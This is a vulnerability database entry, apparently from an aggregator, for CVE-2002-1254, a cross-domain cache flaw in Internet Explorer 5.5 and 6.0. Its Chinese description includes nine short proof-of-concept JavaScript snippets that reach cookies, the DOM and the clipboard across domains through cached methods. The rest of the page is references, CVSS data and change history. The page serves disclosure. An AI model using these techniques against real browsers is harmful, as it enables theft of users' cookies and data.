CVE-2002-1254 (CNNVD-200212-009)

HIGH 有利用代码
中文标题:
Microsoft Internet Explorer 安全漏洞
英文标题:
Internet Explorer 5.5 and 6.0 allows remote attackers to bypass the cross-domain security model and ...
CVSS分数: 7.5
发布时间: 2002-11-27 05:00:00
漏洞类型: 其他
状态: PUBLISHED
数据质量分数: 0.30
数据版本: v4
漏洞描述
中文描述:

Microsoft Internet Explorer(IE)是美国微软(Microsoft)公司的一款Windows操作系统附带的Web浏览器。 Microsoft Internet Explorer是微软开发和维护的WEB浏览器。Internet Explorer在处理缓存对象(cached objects)时存在问题,远程攻击者可以利用这个漏洞执行其他域和安全区域中的脚本代码,造成信息泄露等问题。当窗口之间通信的时候,MSIE安全机制必须确保页面在同一安全区域和同一域中,而缓存对象处理中MSIE安全机制对访问控制检查不充分。当攻击者在自己站点页面中打开窗口时IE会缓存主窗口到子窗口的引用(类似C的指针),虽然这时候子窗口内访问的URL可能已经改变了,但主窗口通过调用引用还是能够被控制,这样就可能使的直接访问不同域和不同安全区域中的内容。攻击者可以通过构建恶意WEB页面,并诱使用户点击,窃取目标用户COOKIE信息,泄露目标用户本地系统文件。下面9个漏洞都是相关于对象缓存问题,但是每个漏洞都是独立的漏洞,使用独立的方法进行利用。下面所描述的包含3个部分,"Cache"显示怎样缓存有问题的对象,"Exploit"显示漏洞怎样工作,"Impact"描述漏洞的危害。"Full access"表示可以访问任意域和任意安全区域中的任意页面文档对象模型(DOM)。1. showModalDialogCache: var fVuln=oWin.showModalDialog;Exploit - IE 5.5:fVuln("javascript:alert(dialogArguments.document.cookie)",oWin,"");Exploit - IE 6: 利用难度比较大,可使用"analyze.dlg"vulnerability.Impact: 在IE5.5中完全访问, IE6中"My Computer"安全区域可访问。2. externalCache: var oVuln=oWin.external;Exploit: oVuln.NavigateAndFind("javascript:alert(document.cookie)","","");Impact: Full access.3. createRangeCache: var fVuln=oWin.document.selection.createRange;Exploit: fVuln().pasteHTML("<imgsrc="javascript:alert(document.cookie)">");Impact: Full access.4. elementFromPointCache: var fVuln=oWin.document.elementFromPoint;Exploit: alert(fVuln(1,1).document.cookie);Impact: Full access.5. getElementByIdCache: var fVuln=oWin.document.getElementById;Exploit: alert(fVuln("ElementIdInNewDoc").document.cookie);Impact: Full access.6. getElementsByNameCache: var fVuln=oWin.document.getElementsByName;Exploit: alert(fVuln("ElementNameInNewDoc")[0].document.cookie);Impact: Full access.7. getElementsByTagNameCache: var fVuln=oWin.document.getElementsByTagName;Exploit: alert(fVuln("BODY")[0].document.cookie);Impact: Full access.8. execCommandCache: var fVuln=oWin.document.execCommand;Exploit: fVuln("SelectAll"); fVuln("Copy");alert(clipboardData.getData("text"));Impact: 读区访问装载的文档9. clipboardDataCache: var oVuln=oWin.clipboardData;Exploit: alert(oVuln.getData("text")); or oVuln.setData("text","data");Impact: 无需考虑设置,读/写访问剪贴板

英文描述:

Internet Explorer 5.5 and 6.0 allows remote attackers to bypass the cross-domain security model and access information on the local system or in other domains, and possibly execute code, via cached methods and objects, aka "Cross Domain Verification via Cached Methods."

CWE类型:
(暂无数据)
标签:
remote windows GreyMagic Software OSVDB-2978
受影响产品
厂商 产品 版本 版本范围 平台 CPE
microsoft ie 6.0 - - cpe:2.3:a:microsoft:ie:6.0:sp1:*:*:*:*:*:*
microsoft internet_explorer 5.5 - - cpe:2.3:a:microsoft:internet_explorer:5.5:*:*:*:*:*:*:*
microsoft internet_explorer 6.0 - - cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*
解决方案
中文解决方案:
(暂无数据)
英文解决方案:
(暂无数据)
临时解决方案:
(暂无数据)
参考链接
6028 vdb-entry
cve.org
访问
MS02-066 vendor-advisory
cve.org
访问
20021022 Vulnerable cached objects in IE (9 advisories in 1) mailing-list
cve.org
访问
ie-cache-showmodaldialog-dom-access(10432) vdb-entry
cve.org
访问
ie-cache-getelementsbytagname-dom-access(10438) vdb-entry
cve.org
访问
ie-cache-getelementsbyname-dom-access(10437) vdb-entry
cve.org
访问
oval:org.mitre.oval:def:388 vdb-entry
cve.org
访问
ie-cache-getelementbyid-dom-access(10436) vdb-entry
cve.org
访问
oval:org.mitre.oval:def:408 vdb-entry
cve.org
访问
ie-cache-elementfrompoint-dom-access(10435) vdb-entry
cve.org
访问
无标题 x_refsource_MISC
cve.org
访问
N-018 third-party-advisory
cve.org
访问
ie-cache-execcommand-dom-access(10439) vdb-entry
cve.org
访问
ExploitDB EDB-21959 EXPLOIT
exploitdb
访问
Download Exploit EDB-21959 EXPLOIT
exploitdb
访问
CVE Reference: CVE-2002-1254 ADVISORY
cve.org
访问
CVSS评分详情
7.5
HIGH
CVSS向量: AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS版本: 2.0
机密性
PARTIAL
完整性
PARTIAL
可用性
PARTIAL
时间信息
发布时间:
2002-11-27 05:00:00
修改时间:
2024-08-08 03:19:28
创建时间:
2025-11-11 15:32:16
更新时间:
2025-11-11 16:16:39
利用信息
此漏洞有可利用代码!
利用代码数量: 1
利用来源:
未知
数据源详情
数据源 记录ID 版本 提取时间
CVE cve_CVE-2002-1254 2025-11-11 15:17:24 2025-11-11 07:32:16
NVD nvd_CVE-2002-1254 2025-11-11 14:50:28 2025-11-11 07:41:03
CNNVD cnnvd_CNNVD-200212-009 2025-11-11 15:08:41 2025-11-11 07:48:49
EXPLOITDB exploitdb_EDB-21959 2025-11-11 15:05:56 2025-11-11 08:16:39
版本与语言
当前版本: v4
主要语言: EN
支持语言:
EN ZH
其他标识符:
:
:
安全公告
暂无安全公告信息
变更历史
v4 EXPLOITDB
2025-11-11 16:16:39
references_count: 13 → 16; tags_count: 0 → 4; data_sources: ['cnnvd', 'cve', 'nvd'] → ['cnnvd', 'cve', 'exploitdb', 'nvd']
查看详细变更
  • references_count: 13 -> 16
  • tags_count: 0 -> 4
  • data_sources: ['cnnvd', 'cve', 'nvd'] -> ['cnnvd', 'cve', 'exploitdb', 'nvd']
v3 CNNVD
2025-11-11 15:48:49
vulnerability_type: 未提取 → 其他; cnnvd_id: 未提取 → CNNVD-200212-009; data_sources: ['cve', 'nvd'] → ['cnnvd', 'cve', 'nvd']
查看详细变更
  • vulnerability_type: 未提取 -> 其他
  • cnnvd_id: 未提取 -> CNNVD-200212-009
  • data_sources: ['cve', 'nvd'] -> ['cnnvd', 'cve', 'nvd']
v2 NVD
2025-11-11 15:41:03
severity: SeverityLevel.MEDIUM → SeverityLevel.HIGH; cvss_score: 未提取 → 7.5; cvss_vector: NOT_EXTRACTED → AV:N/AC:L/Au:N/C:P/I:P/A:P; cvss_version: NOT_EXTRACTED → 2.0; affected_products_count: 0 → 3; data_sources: ['cve'] → ['cve', 'nvd']
查看详细变更
  • severity: SeverityLevel.MEDIUM -> SeverityLevel.HIGH
  • cvss_score: 未提取 -> 7.5
  • cvss_vector: NOT_EXTRACTED -> AV:N/AC:L/Au:N/C:P/I:P/A:P
  • cvss_version: NOT_EXTRACTED -> 2.0
  • affected_products_count: 0 -> 3
  • data_sources: ['cve'] -> ['cve', 'nvd']